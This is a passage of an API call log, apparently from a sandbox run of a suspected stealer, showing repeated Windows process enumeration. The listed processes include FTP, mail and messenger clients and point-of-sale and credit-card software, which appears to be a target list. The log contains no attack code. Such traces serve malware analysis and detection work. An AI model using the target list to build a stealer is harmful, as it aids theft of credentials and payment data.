th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0148.977] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0148.978] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0148.980] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0148.982] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0148.984] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0148.985] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0148.987] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0148.989] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0148.991] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0148.993] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0148.995] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0148.997] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0148.999] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0149.002] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0149.004] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0149.008] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0149.012] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0149.014] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0149.016] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0149.018] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0149.020] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0149.022] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0149.025] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0149.027] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0149.029] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0149.031] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0149.033] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0149.035] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0149.037] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0149.039] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0149.041] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0149.043] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0149.046] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0149.048] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0149.050] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0149.052] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0149.054] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0149.056] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0149.058] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0149.060] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0149.062] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0149.064] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0149.066] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0149.067] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0149.069] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0149.071] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0149.074] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0149.077] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0149.078] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0149.080] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0149.082] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0149.088] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0149.090] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0149.091] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0149.093] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0149.095] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0149.096] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0149.098] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0149.100] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0149.102] CloseHandle (hObject=0x1fc4) returned 1 [0149.102] Sleep (dwMilliseconds=0x64) [0149.245] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bf8 [0149.257] Process32First (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.259] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0149.261] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0149.262] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.264] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0149.265] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.267] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0149.269] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0149.270] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0149.272] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.273] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.275] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0149.276] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.278] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.283] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.313] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.315] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.316] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.318] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.320] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0149.321] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0149.323] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0149.325] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0149.327] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.328] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: 